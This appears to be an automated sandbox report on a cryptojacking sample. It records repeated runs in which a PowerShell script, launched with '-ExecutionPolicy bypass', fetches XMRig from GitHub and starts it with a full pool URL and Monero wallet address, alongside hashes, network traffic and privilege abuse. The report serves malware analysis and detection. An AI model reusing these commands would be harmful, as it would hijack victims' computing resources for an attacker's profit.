Malware Analysis Report

2025-04-19 14:54

Sample ID 240522-yy1n5seg81
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags xmrig execution miner
Score 10/10

Analysis Overview

Score 10/10

SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

xmrig

XMRig Miner payload

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious use of FindShellTrayWindow

Suspicious behavior: LoadsDriver

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 20:12

Signatures

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:27

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1chwhlrd.k2u.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:31

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1783s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 214.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mlgdndge.24m.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:18

Platform

win10-20240404-en

Max time kernel

1792s

Max time network

1786s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 105.193.132.51.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5gqx5xjj.mjn.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:42

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1767s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 8.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 247.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 98.251.17.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bvxv4s3q.ddm.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:51

Platform

win7-20240215-en

Max time kernel

1565s

Max time network

1566s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Network

N/A

Files

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:17

Platform

win7-20240221-en

Max time kernel

1559s

Max time network

1564s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Network

N/A

Files

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:18

Platform

win10v2004-20240426-en

Max time kernel

1791s

Max time network

1783s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.171:443 www.bing.com tcp
US 8.8.8.8:53 171.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
NL 23.62.61.171:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cx5kxpd5.il4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:24

Platform

win10v2004-20240508-en

Max time kernel

1799s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3772,i,14486271492189381216,15799931579469722648,262144 --variations-seed-version --mojo-platform-channel-handle=4128 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4752,i,14486271492189381216,15799931579469722648,262144 --variations-seed-version --mojo-platform-channel-handle=4792 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.187:443 www.bing.com tcp
US 8.8.8.8:53 187.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 28.73.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_icfm5tsa.ibw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:25

Platform

win11-20240508-en

Max time kernel

1800s

Max time network

1794s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
